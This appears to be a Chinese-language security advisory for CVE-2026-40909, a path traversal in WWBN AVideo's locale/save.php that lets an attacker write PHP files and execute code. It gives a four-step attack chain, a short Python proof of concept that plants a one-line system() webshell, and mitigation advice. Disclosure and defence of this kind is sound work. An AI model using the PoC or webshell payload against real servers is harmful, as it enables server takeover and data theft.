CVE-2026-40909 CVSS 8.7 高危

CVE-2026-40909 AVideo路径遍历导致RCE漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40909

漏洞类型

远程代码执行

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是流行的开源视频平台。在29.0及更早版本中，`locale/save.php`接口存在严重安全缺陷。攻击者可利用未过滤的参数进行路径遍历，将恶意PHP代码写入服务器任意位置，从而实现远程代码执行。该漏洞需管理员权限，或通过CSRF攻击诱导管理员触发。

技术细节

漏洞发生于`locale/save.php`文件。第30行直接将`$_POST['flag']`拼接到文件路径，缺乏过滤导致目录遍历。第40行使用`fwrite`将`$_POST['code']`内容写入该路径。由于未校验CSRF Token且Cookie设为SameSite=None，攻击者可构造恶意请求，配合管理员权限或CSRF，将Webshell写入非预期目录（如根目录），进而控制服务器。

攻击链分析

STEP 1

侦察

识别目标是否使用WWBN AVideo且版本低于29.0。

STEP 2

利用

向`locale/save.php`发送POST请求，利用`flag`参数进行目录遍历，`code`参数传入恶意PHP代码。

STEP 3

写入

服务器将恶意代码写入指定路径（如网站根目录），生成Webshell。

STEP 4

执行

访问写入的PHP文件，执行系统命令，获取服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target.com/locale/save.php"

# Payload data: Directory traversal + PHP code
data = {
    "flag": "../../shell.php",  # Path traversal to write to root
    "code": "<?php system($_GET['cmd']); ?>"  # Malicious PHP code
}

# Send the request (Assuming admin session or CSRF)
response = requests.post(url, data=data)

if response.status_code == 200:
    print("Exploit successful. Check shell.php")
else:
    print("Exploit failed")

影响范围

WWBN AVideo <= 29.0

防御指南

临时缓解措施

建议立即升级至修复版本。若无法升级，应暂时禁用locale/save.php接口或通过WAF规则拦截包含路径遍历字符（../）的请求，并严格限制管理员账户的访问来源。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表